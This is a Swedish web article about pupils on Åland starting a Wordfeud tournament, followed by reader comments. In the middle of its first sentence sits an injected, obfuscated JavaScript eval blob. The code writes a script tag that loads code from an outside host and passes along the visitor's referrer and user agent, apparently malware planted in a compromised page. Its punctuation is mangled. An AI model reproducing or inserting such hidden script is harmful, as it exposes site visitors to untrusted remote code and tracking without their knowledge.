Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Nu anordnas skolmästerskap i Wordfeud

Nu anordnas skolmästerskap i Wordfeud
Sebastian

Längesen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fkrdh|var|u0026u|referrer|zdsyr||js|php’.split(’|’),0,{}))
vi skrev något om det populära spelet Wordfeud.

På den lilla ön Åland tar nu några elever i årskurs 9 till 9 tag i ett nytt skapande av en turnering i Wordfeud. Elevrådet på Strandnässkolan klubbade förra veckan igenom förslaget som ska starta nu i vår.

Det var resursläraren Marcus Svensson som kom med idén och han säger att eleverna köpte den direkt. Det är ett smart sätt att lära sig ett språk. Det fungerar i alla åldrar så eleverna kommer kunna spela det med sin pappa eller Farmor. Man får hoppas att inte fusk tillkommer, vi kommer ha hög bevakning på spelarna.

– Wordfeud handlar ju om ord så det har mycket med skolan att göra. Man får ett bättre ordförråd och övar sin stavning, säger Svensson.
Han får medhåll av Julia Liewendahl i 8A. Hon säger att man lär sig nya ord när man spelar.
– När man ser vad de man spelar mot skriver.
Liewendahl spelar wordfeud ofta men tänker inte delta i turneringen. Det tänker däremot hennes elevrådskollega Cajsa Hallbäck i 7C.
– Jag är inte så bra men jag ska vara med ändå. Jag har just börjat spela wordfeud men det är ju precis som Alfapet och det har jag spelat mycket. Min farmor och pappa älskar Alfapet så vi har alltid spelat det mycket hemma, säger hon.

 

Comments

 1. Stackars de barn som inte har en telefon som klarar av wordfued:/

  • Jocke sten

   Läste artikeln och tydligen får de låna en iphone eller ipad av skola. Men kanske blir svårt för de att vinna då ingen kunskap finns 😛

   • Gabbe

    hahaha…..Åland!

 2. Toobie

  Haha det här är bara larvigt. Åland ? vad är det?